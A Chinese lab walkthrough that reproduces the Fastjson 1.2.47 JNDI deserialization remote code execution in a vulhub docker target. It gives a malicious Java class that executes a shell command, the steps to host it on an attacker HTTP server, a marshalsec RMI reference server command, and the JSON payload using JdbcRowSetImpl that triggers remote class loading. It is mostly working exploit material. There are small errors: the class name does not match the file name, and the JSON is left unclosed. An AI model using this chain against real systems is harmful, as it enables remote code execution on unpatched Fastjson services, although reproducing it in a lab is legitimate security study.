| 靶机 | linux |
| 攻击机 | windows |
| 恶意代码存放和rmi/ldap的服务机 | linux |
2.攻击机,不做处理有burpsuite就行 3.服务机处理需要搭建docker、docker-compose建议老版本(注意检验docker-compose的版本是否与本机的架构一致)、下载docker-compose到目录 /usr/local/bin/后 执行权限分配 sudo chmod 777 docker-compose
然后运行 ln -s /usr/local/bin/docker-compose /usr/bin docker-compose
(1).继续进入vuln/fastjson/1.2.47目录下
运行docker命令 docker-compose up -d
环境默认已经启用 访问路径为ip:8090
(1).安装jdk(注意版本jdk8u181,配置环境变量),安装python3且配置环境变量 ,借用marshalsec.jar文件(开启rmi/ladp服务)marshalsec.jar文件可通过windows下载GitHub - mbechler/marshalsec的源码,然后通过windows上的maven对源码进行mvn clean package -DskipTests 编译即可生成
(2).编写恶意代码Exploit.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/success"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
并且利用javac Exploit.java编译成Exploit.class文件
4.攻击机需要burp 抓靶机ip:8090包(3).将marshalsec.jar和Exploit.class放在同一个目录中,并再此目录下运行
python -m http.server 9999 命令搭建一个临时服务器,访问端口为
服务机ip:9999 可以访问验证下
(4).再看一个服务器ssh窗口,利用marshalsec.jar生成一个rmi或者ldap服务 运行命令为java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://服务机ip:9999/#TouchFile" 9001
利用burpsuiter的repeater重放功能
5.靶机的服务下生成 success文件说明成功修改GET请求包为POST
修改name和age的值如下并提交
{
"name":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"age":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://服务机ip:9001/Exploit",
"autoCommit":true
}
靶机进入容器操作,docker exec -it 容器id /bin/bash
执行命令查看 ls /tmp/是否有success
退出容器输入exit
